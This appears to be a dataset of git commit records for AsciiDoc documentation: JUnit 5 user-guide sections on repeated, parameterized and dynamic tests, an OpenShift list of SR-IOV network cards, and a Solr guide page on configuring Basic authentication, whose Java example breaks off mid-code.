The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to the example from the previous section, whereas\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach`, it will be executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. 
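As a rough sketch of what such a `beforeEach()` method could look like -- a minimal reconstruction for illustration, not the actual `RepeatedTestsDemo` source, and the log message format is an assumption:\n\n[source,java]\n----\nimport java.util.logging.Logger;\n\nimport org.junit.jupiter.api.BeforeEach;\nimport org.junit.jupiter.api.RepeatedTest;\nimport org.junit.jupiter.api.RepetitionInfo;\nimport org.junit.jupiter.api.TestInfo;\n\nclass RepeatedTestsSketch {\n\n\tprivate static final Logger logger = Logger.getLogger(\"RepeatedTestsSketch\");\n\n\t@BeforeEach\n\tvoid beforeEach(TestInfo testInfo, RepetitionInfo repetitionInfo) {\n\t\t\/\/ Both parameters are supplied by the built-in parameter resolvers.\n\t\tint currentRepetition = repetitionInfo.getCurrentRepetition();\n\t\tint totalRepetitions = repetitionInfo.getTotalRepetitions();\n\t\tString methodName = testInfo.getTestMethod().get().getName();\n\t\tlogger.info(String.format(\"About to execute repetition %d of %d for %s\",\n\t\t\t\tcurrentRepetition, totalRepetitions, methodName));\n\t}\n\n\t@RepeatedTest(10)\n\tvoid repeatedTest() {\n\t\t\/\/ ...\n\t}\n}\n----\n\n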
Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` or the `junitPlatformTest` Gradle plugin with the\nunicode theme enabled, execution of `RepeatedTestsDemo` results in the following output\nto the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different arguments. 
They are\ndeclared just like regular `@Test` methods but use the `@ParameterizedTest` annotation instead. In\naddition, you must declare at least one _source_ that will provide the arguments for each\ninvocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nThis parameterized test uses the `@ValueSource` annotation to specify a `String` array as the source\nof arguments. When executing this method, each invocation will be reported separately. For instance,\nthe `ConsoleLauncher` will print output similar to the following.\n\n....\ntestWithStringParameter(String) \u2714\n\u251c\u2500 [1] Hello \u2714\n\u2514\u2500 [2] World \u2714\n....\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests, you need to add a dependency on the `junit-jupiter-params`\nartifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. Please\nrefer to the JavaDoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify an array of literal\nvalues (`String`, `int`, `long`, or `double`) and can only be used for providing a\nsingle parameter per invocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides an optional\n`names` parameter that lets you specify which constants shall be used. If omitted, all constants\nwill be used, as in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`@MethodSource` allows you to refer to one or multiple methods of the test class. Each method must\nreturn a `Stream`, an `Iterable`, an `Iterator`, or an array of arguments. 
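For orientation, here is a hedged sketch of a factory method and the test that consumes it; the method and value names are illustrative, not taken from the guide's `ParameterizedTestDemo` sources.\n\n[source,java]\n----\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\n\nimport java.util.stream.Stream;\n\nimport org.junit.jupiter.params.ParameterizedTest;\nimport org.junit.jupiter.params.provider.MethodSource;\n\nclass MethodSourceSketch {\n\n\t@ParameterizedTest\n\t@MethodSource(\"stringProvider\")\n\tvoid testWithSimpleMethodSource(String argument) {\n\t\tassertNotNull(argument);\n\t}\n\n\t\/\/ Referenced by name from the @MethodSource annotation above.\n\tstatic Stream<String> stringProvider() {\n\t\treturn Stream.of(\"foo\", \"bar\");\n\t}\n}\n----\n\n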
In addition, each such factory method\nmust be `static` and must not accept any arguments.\n\nIf you only need a single parameter, you can return instances of the parameter type directly as\ndemonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also supported.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIn case you need multiple parameters, you need to return `Arguments` instances as shown below.\nNote that `Arguments.of(Object...)` is a static factory method defined in the interface itself.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in implicit\ntype converters. 
The conversion process depends on the declared type of each method parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will automatically\nbe converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are currently implicitly converted to the following target types.\n\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` \u2192 `true`\n| `byte`\/`Byte` | `\"1\"` \u2192 `(byte) 1`\n| `char`\/`Character` | `\"o\"` \u2192 `'o'`\n| `short`\/`Short` | `\"1\"` \u2192 `(short) 1`\n| `int`\/`Integer` | `\"1\"` \u2192 `1`\n| `long`\/`Long` | `\"1\"` \u2192 `1L`\n| `float`\/`Float` | `\"1.0\"` \u2192 `1.0f`\n| `double`\/`Double` | `\"1.0\"` \u2192 `1.0d`\n| `Enum` subclass | `\"SECONDS\"` \u2192 `TimeUnit.SECONDS`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` \u2192 `Instant.ofEpochMilli(0)`\n| `java.time.LocalDate` | `\"2017-03-14\"` \u2192 `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` \u2192 `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` \u2192 `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` \u2192 `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` \u2192 `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.Year` | `\"2017\"` \u2192 `Year.of(2017)`\n| `java.time.YearMonth` | `\"2017-03\"` \u2192 `YearMonth.of(2017, 3)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` \u2192 `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of using implicit argument conversion you may explicitly specify an `ArgumentConverter` to\nuse for a certain parameter using the `@ConvertWith` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\nExplicit argument converters are meant to be implemented by test authors. Thus,\n`junit-jupiter-params` only provides a single explicit argument converter that may also serve as a\nreference implementation: `JavaTimeArgumentConverter`. 
It is used via the composed annotation\n`JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. 
However, method\nparameters that are resolved by argument sources need to come first in the argument list.\nSince a test class may contain regular tests as well as parameterized tests with different\nparameter lists, values from argument sources are not resolved for lifecycle methods (e.g.\n`@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in <<writing-tests-annotations>>\nis very similar to the `@Test` annotation in JUnit 4.\nBoth describe methods that implement test cases.\nThese test cases are static in the sense that they are fully specified at compile time,\nand their behavior cannot be changed by anything happening at runtime.\n_Assumptions provide a basic form of dynamic behavior but are intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests, a completely new kind of test programming model has been introduced in JUnit Jupiter.\nThis new kind of test is a _dynamic test_ which is generated at runtime by a factory method\nthat is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but rather a factory for test cases.\nThus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a `Stream`,\n`Collection`, `Iterable`, or `Iterator` of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child nodes,\nenabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will then be executed lazily,\nenabling dynamic and even non-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling `stream.close()`,\nmaking it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static`\nand may optionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime.\nIt is composed of a _display name_ and an `Executable`. `Executable` is a `@FunctionalInterface`\nwhich means that the implementations of dynamic tests can be provided as _lambda expressions_\nor _method references_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different from that of a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. 
This means that `@BeforeEach` and `@AfterEach` methods and their corresponding\nextension callbacks are executed for the `@TestFactory` method but not for each _dynamic test_.\nIn other words, if you access fields from the test instance within a lambda expression for\na dynamic test, those fields will not be reset by callback methods or extensions between\nthe execution of individual dynamic tests generated by the same `@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories and dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances.\nMost of these examples do not really exhibit dynamic behavior\nbut merely demonstrate the supported return types in principle.\nHowever, `dynamicTestsFromStream()` and `dynamicTestsFromIntStream()` demonstrate how\neasy it is to generate dynamic tests for a given set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature.\n`generateRandomNumberOfTests()` implements an `Iterator` that generates random numbers, a\ndisplay name generator, and a test executor and then provides all three to `DynamicTest.stream()`.\nAlthough the non-deterministic behavior of `generateRandomNumberOfTests()` is of course in conflict with\ntest repeatability and should thus be used with care, it serves to demonstrate the expressiveness\nand power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing `DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n
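To round out the section, here is a compact, self-contained sketch of a stream-based factory. It is independent of `DynamicTestsDemo`; the palindrome check and input words are illustrative.\n\n[source,java]\n----\nimport static org.junit.jupiter.api.Assertions.assertTrue;\nimport static org.junit.jupiter.api.DynamicTest.dynamicTest;\n\nimport java.util.stream.Stream;\n\nimport org.junit.jupiter.api.DynamicTest;\nimport org.junit.jupiter.api.TestFactory;\n\nclass DynamicTestsSketch {\n\n\t@TestFactory\n\tStream<DynamicTest> palindromeTests() {\n\t\t\/\/ One dynamic test per input word, named after the word it checks.\n\t\treturn Stream.of(\"racecar\", \"radar\", \"level\")\n\t\t\t\t.map(word -> dynamicTest(\"palindrome: \" + word,\n\t\t\t\t\t\t() -> assertTrue(isPalindrome(word))));\n\t}\n\n\tprivate static boolean isPalindrome(String word) {\n\t\treturn new StringBuilder(word).reverse().toString().equals(word);\n\t}\n}\n----\n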
","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fdc646bbfebbe2f742d2b18823b5b9b2986404a5","subject":"OSDOCS-1807: sr-iov supp x710","message":"OSDOCS-1807: sr-iov supp x710\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-sriov-supported-devices.adoc","new_file":"modules\/nw-sriov-supported-devices.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/hardware_networks\/about-sriov.adoc\n\n[id=\"supported-devices_{context}\"]\n= Supported devices\n\n{product-title} supports the following network interface controller (NIC) models:\n\n* Intel X710 10GbE SFP+ with vendor ID `0x8086` and device ID `0x1572`\n* Intel XXV710 25GbE SFP28 with vendor ID `0x8086` and device ID `0x158b`\n* Mellanox MT27710 Family [ConnectX-4 Lx] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1015`\n* Mellanox MT27800 Family [ConnectX-5] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27800 Family [ConnectX-5] 100GbE with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27700 Family [ConnectX-4] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1013`\n* Mellanox MT27800 Family [ConnectX-5] VPI adapter card, EDR IB 
(100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, 100Gb\/s (HDR100, EDR IB), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, HDR200 IB (200Gb\/s), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/hardware_networks\/about-sriov.adoc\n\n[id=\"supported-devices_{context}\"]\n= Supported devices\n\n{product-title} supports the following Network Interface Card (NIC) models:\n\n* Intel XXV710 25GbE SFP28 with vendor ID `0x8086` and device ID `0x158b`\n* Mellanox MT27710 Family [ConnectX-4 Lx] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1015`\n* Mellanox MT27800 Family [ConnectX-5] 25GbE dual-port SFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27800 Family [ConnectX-5] 100GbE with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT27700 Family [ConnectX-4] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1013`\n* Mellanox MT27800 Family [ConnectX-5] VPI adapter card, EDR IB (100Gb\/s), single-port QSFP28 with vendor ID `0x15b3` and device ID `0x1017`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, 100Gb\/s (HDR100, EDR IB), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n* Mellanox MT28908 Family [ConnectX-6] VPI adapter card, HDR200 IB (200Gb\/s), single-port QSFP56 with vendor ID `0x15b3` and device ID `0x101b`\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4eea44103eab800daddabc99eb82f450700108aa","subject":"Ref Guide: Add callouts to the security.json example","message":"Ref Guide: Add callouts to the security.json example\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/basic-authentication-plugin.adoc","new_file":"solr\/solr-ref-guide\/src\/basic-authentication-plugin.adoc","new_contents":"= Basic Authentication Plugin\n:page-shortname: basic-authentication-plugin\n:page-permalink: basic-authentication-plugin.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nSolr can support Basic authentication for users with the use of the BasicAuthPlugin.\n\nAn authorization plugin is also available to configure Solr with permissions to perform various activities in the system. 
The authorization plugin is described in the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\n[[BasicAuthenticationPlugin-EnableBasicAuthentication]]\n== Enable Basic Authentication\n\nTo use Basic authentication, you must first create a `security.json` file. This file, and where to put it, is described in detail in the section <<authentication-and-authorization-plugins.adoc#AuthenticationandAuthorizationPlugins-EnablePluginswithsecurity.json,Enable Plugins with security.json>>.\n\nFor Basic authentication, the `security.json` file must have an `authentication` part which defines the class being used for authentication. Usernames and passwords (as a sha256(password+salt) hash) can be added when the file is created, or can be added later with the Basic authentication API, described below.\n\nThe `authorization` part is not related to Basic authentication, but is a separate authorization plugin designed to support fine-grained user access control. For more information, see the section <<rule-based-authorization-plugin.adoc#rule-based-authorization-plugin,Rule-Based Authorization Plugin>>.\n\nAn example `security.json` showing both sections is provided below to demonstrate how these plugins can work together:\n\n[source,json]\n----\n{\n"authentication":{ <1>\n \"blockUnknown\": true, <2>\n \"class\":\"solr.BasicAuthPlugin\",\n \"credentials\":{\"solr\":\"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=\"} <3>\n},\n\"authorization\":{\n \"class\":\"solr.RuleBasedAuthorizationPlugin\",\n \"permissions\":[{\"name\":\"security-edit\",\n \"role\":\"admin\"}], <4>\n \"user-role\":{\"solr\":\"admin\"} <5>\n}}\n----\n\nThere are several things defined in this file:\n\n<1> Basic authentication and rule-based authorization plugins are enabled.\n<2> The parameter `\"blockUnknown\":true` means that unauthenticated requests are not allowed to pass through.\n<3> A user called 'solr', with a password `'SolrRocks'`, has been defined.\n<4> The 'admin' role has been defined, and it has permission to edit security settings.\n<5> The 'solr' user has been assigned to the 'admin' role.\n\nSave your settings to a file called `security.json` locally. If you are using Solr in standalone mode, you should put this file in `$SOLR_HOME`.\n\nIf `blockUnknown` does not appear in the `security.json` file, it will default to `false`. This has the effect of not requiring authentication at all. In some cases, you may want this; for example, if you want to have `security.json` in place but aren't ready to enable authentication. However, you will want to ensure that this parameter is set to `true` in order for authentication to be truly enabled in your system.\n\nIf you are using SolrCloud, you must upload `security.json` to ZooKeeper. You can use this example command, ensuring that the ZooKeeper port is correct:\n\n[source,bash]\n----\nbin\/solr zk cp file:path_to_local_security.json zk:\/security.json -z localhost:9983\n----\n\n[[BasicAuthenticationPlugin-Caveats]]\n=== Caveats\n\nThere are a few things to keep in mind when using the Basic authentication plugin.\n\n* Credentials are sent in plain text by default. It's recommended to use SSL for communication when Basic authentication is enabled, as described in the section <<enabling-ssl.adoc#enabling-ssl,Enabling SSL>>.\n* A user who has access to write permissions to `security.json` will be able to modify all the permissions and how users have been assigned permissions. Special care should be taken to only grant access to editing security to appropriate users.\n* Your network should, of course, be secure. Even with Basic authentication enabled, you should not unnecessarily expose Solr to the outside world.\n\n
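If you prefer to generate the `credentials` value for `security.json` yourself, rather than using the Authentication API described below, the following sketch may be a useful starting point. It assumes the commonly documented scheme used by Solr's `Sha256AuthenticationProvider` (a base64-encoded sha256(sha256(salt+password)) digest, a space, then the base64-encoded salt); verify this against your Solr version before relying on it:\n\n[source,java]\n----\nimport java.nio.charset.StandardCharsets;\nimport java.security.MessageDigest;\nimport java.security.SecureRandom;\nimport java.util.Base64;\n\npublic class SolrCredentialsSketch {\n  public static void main(String[] args) throws Exception {\n    String password = \"SolrRocks\";\n\n    \/\/ Random per-user salt; 32 bytes is assumed here.\n    byte[] salt = new byte[32];\n    new SecureRandom().nextBytes(salt);\n\n    \/\/ Assumed scheme: sha256(sha256(salt + password)).\n    MessageDigest sha256 = MessageDigest.getInstance(\"SHA-256\");\n    sha256.update(salt);\n    sha256.update(password.getBytes(StandardCharsets.UTF_8));\n    byte[] inner = sha256.digest();\n    byte[] outer = sha256.digest(inner);\n\n    \/\/ Stored form: base64(hash), a space, then base64(salt).\n    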